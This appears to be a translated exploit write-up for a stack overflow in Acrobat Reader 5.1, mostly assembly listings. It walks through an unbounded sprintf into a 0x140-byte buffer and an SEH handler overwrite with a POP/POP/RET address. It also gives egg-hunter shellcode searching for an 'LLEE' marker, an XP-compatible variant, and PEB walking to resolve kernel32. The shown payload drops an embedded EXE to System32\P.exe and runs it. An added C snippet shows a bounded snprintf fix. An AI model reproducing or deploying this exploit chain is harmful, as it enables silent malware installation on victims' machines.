Author: Leven
Only valid for Acrobat Reader 5.1
Put a long
Problem code:
001b: 2200E249 55             PUSH EBP
001b: 2200E24A 8BEC           MOV EBP, ESP
001b: 2200E24C 81EC40010000   SUB ESP, 00000140        // allocate the 0x140-byte local buffer
001b: 2200E252 53             PUSH EBX
001b: 2200E253 56             PUSH ESI
001b: 2200E254 57             PUSH EDI
001b: 2200E255 6A01           PUSH 01
001b: 2200E257 6A05           PUSH 05
001b: 2200E259 33DB           XOR EBX, EBX
001b: 2200E25B FF7508         PUSH DWORD PTR [EBP+08]
001b: 2200E25E 8D4DFC         LEA ECX, [EBP-04]
001b: 2200E261 895DFC         MOV [EBP-04], EBX
001b: 2200E264 E839470500     CALL 220629A2
001b: 2200E269 A1542D0A22     MOV EAX, [220A2D54]
001b: 2200E26E 53             PUSH EBX
001b: 2200E26F FF75FC         PUSH DWORD PTR [EBP-04]
001b: 2200E272 FF5064         CALL [EAX+64]
001b: 2200E275 59             POP ECX
001b: 2200E276 59             POP ECX
001b: 2200E277 50             PUSH EAX
001b: 2200E278 8D85C0FEFFFF   LEA EAX, [EBP-0140]
001b: 2200E27E 682C4D0922     PUSH 22094D2C
001b: 2200E283 50             PUSH EAX
001b: 2200E284 FF1564F20822   CALL [MSVCRT!sprintf]    // unbounded sprintf call: this is where the overflow happens
001b: 2200E28A 83C40C         ADD ESP, 0C
001b: 2200E28D 8D85C0FEFFFF   LEA EAX, [EBP-0140]
001b: 2200E293 50             PUSH EAX
001b: 2200E294 FF15FCF00822   CALL [kernel32!OutputDebugStringA]
001b: 2200E29A FF75FC         PUSH DWORD PTR [EBP-04]
001b: 2200E29D 8B7510         MOV ESI, [EBP+10]
001b: 2200E2A0 56             PUSH ESI
001b: 2200E2A1 E8D7110000     CALL 2200F47D            // the exception is raised inside this call
The local buffer is 0x140 bytes and sprintf performs no length check, so the stack overflows; both the saved return address and the exception handler records above the buffer can be overwritten.
The nearest return address is at 2200E697, kilobytes away, too far to be practical, so it is not considered.
Instead an exception handler address is overwritten. The exception handler linked list:
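As an added illustration of the defect the listing shows (this is not code from the original write-up): the same fixed 0x140-byte stack buffer filled by sprintf(), beside the bounded form a fix would use, with the snprintf() return-value check that detects truncation. The format string, the function names and the sample inputs are assumptions; the real format string at 22094D2C is not shown on the page.

```c
#include <stdio.h>
#include <string.h>

#define DEBUG_BUF_SIZE 0x140          /* matches SUB ESP, 0x140 in the listing */
#define FMT "debug: %s"               /* hypothetical; the real format string is not on the page */

/* Vulnerable shape: sprintf() writes as many bytes as the expansion needs,
 * so a 'name' longer than the buffer overwrites the saved registers, the
 * return address and any SEH records that sit above the buffer. */
void build_debug_line_unsafe(char *out /* DEBUG_BUF_SIZE bytes */, const char *name)
{
    sprintf(out, FMT, name);
}

/* Hardened shape: snprintf() never writes past out_len, and its return value
 * is the length the full expansion WOULD have had, so truncation is visible.
 * Returns 0 when the line fits, -1 when it was truncated. */
int build_debug_line_safe(char *out, size_t out_len, const char *name)
{
    int needed = snprintf(out, out_len, FMT, name);
    if (needed < 0 || (size_t)needed >= out_len) {
        /* out is still NUL-terminated, but report the failure so the caller
         * does not act on a silently truncated line. */
        return -1;
    }
    return 0;
}

/* Constructed sample inputs: a short name that fits, and one long enough to
 * overrun the buffer in the unsafe version (which is therefore only called
 * with the short input here). Returns 1 when both checks behave as expected. */
int demo(void)
{
    char buf[DEBUG_BUF_SIZE];
    char longname[DEBUG_BUF_SIZE + 64];
    memset(longname, 'A', sizeof(longname) - 1);
    longname[sizeof(longname) - 1] = '\0';

    int short_ok = build_debug_line_safe(buf, sizeof buf, "sample.pdf");
    int long_ok  = build_debug_line_safe(buf, sizeof buf, longname);
    build_debug_line_unsafe(buf, "sample.pdf");
    return (short_ok == 0 && long_ok == -1) ? 1 : 0;
}
```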
12ed30
12ef3c
12f0e0
12F598
12FF04
12FFB0
12FFE0
The first record, 12ed30, is overwritten: the handler is changed to 774A295A, the address of a POP ESI, POP EAX, RET sequence (5E 5F C3), and the four bytes before it are changed to:
PUSH ECX        51
POP ECX         59
POP EAX         58             // this just leaves the pointer to the CONTEXT in EAX, which is used later
PUSH 774A295A   68 ...         // the return address 774A295A is simply skipped over as the PUSH operand, and the instructions after it run
What follows 774A295A is the shellcode.
After a few JAE jumps, control reaches a region without the printable-character restriction, but only 160 bytes are available there. Those bytes are used to search memory for the marker LLEE and so find the real shellcode (placed after the XDF file).
Memory search code 1:
    JMP EXCEP1
EXCEP2:
    MOV ECX, FS:[0]            // take over exception handling
    PUSH ECX
    MOV FS:[0], ESP
    MOV EDX, 0x45454C4D        // becomes LLEE after the DEC
    DEC EDX
    MOV EAX, ESI
NEXT:
    INC EAX                    // search memory
    CMP [EAX], EDX
    JZ FIND
    JMP NEXT
FIND:
    ADD EAX, 4                 // found: skip the marker and jump
    JMP EAX
EXCEP1:
    CALL EXCEP2
    MOV EDX, [ESP+0xC]
    XOR EBX, EBX
    MOV BL, 1
    SHL EBX, 0x0C
    ADD [EDX+0xB0], EBX
    XOR EAX, EAX
    RET
Experiments showed that this memory-search method does not work on XP (only on 2K), because XP's exception dispatcher performs a check that 2K does not:
001b: 77f978d1 8B4304         MOV EAX, [EBX+04]        // EAX is the address of the first handler in the exception chain, i.e. EXCEP1 above
001b: 77f978d4 3B45FC         CMP EAX, [EBP-04]
001b: 77f978d7 7209           JB 77F978E2
001b: 77f978d9 3B45F8         CMP EAX, [EBP-08]        // [EBP-08] is taken from FS:[4], StackBase
001b: 77F978DC 0F82A8000000   JB 77F9798A              // if the exception handler is below StackBase the function is not called (handlers on the stack are not allowed?)
So, for compatibility with XP, the following memory-search code is used instead:
    MOV EDX, [ESP+8]           // ESP+8 is exactly the first record of the previous exception chain
    MOV FS:[0], EDX            // FS:[0] was modified automatically by the system; put the original handler back into FS:[0], since execution has already returned here
    MOV EAX, [EAX+0xB0]        // [EAX+0xB0] is CONTEXT.Eax; after the POPs and PUSHes above, EAX points to the original ESP+C, i.e. the CONTEXT
    MOV EDX, 0x45454C4D        // normal search from here on
    DEC EDX
    ADD EAX, 0x1000
NEXT:
    INC EAX
    CMP [EAX], EDX
    JZ FIND
    JMP NEXT
FIND:
    ADD EAX, 4
    JMP EAX
After the real shellcode is found, it gets the base address of kernel32.dll through the PEB (98 needs separate handling), then resolves the address of each API:
    MOV EAX, FS:[0x30]         // PEB
    MOV EAX, [EAX+0x0C]        // PEB.Ldr
    MOV ESI, [EAX+0x1C]        // InInitializationOrderModuleList.Flink
    LODSD                      // next entry in the list
    MOV EAX, [EAX+0x08]        // DllBase of that entry (kernel32.dll)
Afterwards the shellcode opens its own file, extracts the EXE embedded at a specified file offset to System32\P.exe, and executes it.